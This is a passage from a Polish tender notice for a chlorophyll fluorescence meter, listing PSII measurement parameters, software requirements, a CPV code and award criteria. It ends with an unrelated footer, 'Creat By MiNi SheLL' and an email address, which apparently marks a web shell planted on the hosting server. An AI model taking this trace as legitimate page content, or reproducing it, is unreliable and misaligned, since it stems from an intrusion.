wydajność pułapkowania energii świetlnej w centrach reakcji fotosyntetycznej fotosystemu II (PSII); wydajność, z którą energia świetlna pułapkowana w PSII napędza dalsze etapy łańcucha transportu elektronów, czyli wydajność łańcucha transportu elektronów; wydajność kwantowa fazy jasnej fotosyntezy; ogólny indeks sprawności wyliczany dla jednakowej ilości aktywnych centrów reakcji PSII w stanie zrelaksowanym i wzbudzonym oraz ilości energii świetlnej absorbowanej pojedyncze centrum reakcji PSII (PIABS); fenomenologiczny strumień energii absorbowanej przez anteny PSII, gdzie CS to wzbudzony, czynny przekrój liścia; ilość aktywnych centrów reakcji w stosunku do ogólnej ilości absorbowanej energii świetlnej; fenomenologiczny strumień energii pułapkowanej w centrach reakcji PSII; ilość energii pułapkowanej w pojedynczym, aktywnym centrum reakcji PSII; fenomenologiczny strumień energii używanej do napędzania transportu elektronów; ilość energii używanej do napędzania transportu elektronów w przeliczeniu na pojedyncze, aktywne centrum reakcji PSII; 	fenomenologiczny strumień energii rozpraszanej w centrach reakcji PSII; ilość energii rozpraszanej w pojedynczym, aktywnym centrum reakcji PSII; ilość aktywnych centrów reakcji we wzbudzonym fragmencie liścia; ilość aktywnych centrów reakcji w stanie relaksacji fragmentu liścia; sprawność kompleksu rozkładającego wodę. 
- pamięć urządzenia umożliwiająca zapis co najmniej 5 protokółów doświadczalnych 
o definiowanym przez użytkownika czasie/intensywności impulsu, czasie/intensywności preiluminacji 
- rejestracja i przechowywanie danych dotyczących pełnej krzywej kinetyki fluorescencji chlorofilu pochodzących z minimum 1000 pomiarów
- oprogramowanie pracujące w systemie operacyjnym Windows umożliwiające:
importowanie danych z urządzenia, ich podgląd, graficzną prezentację oraz kalkulację parametrów fluorescencji chlorofilu oraz ich eksport do arkusza kalkulacyjnego MS Excel, edycję i eksport do urządzenia protokołów doświadczalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com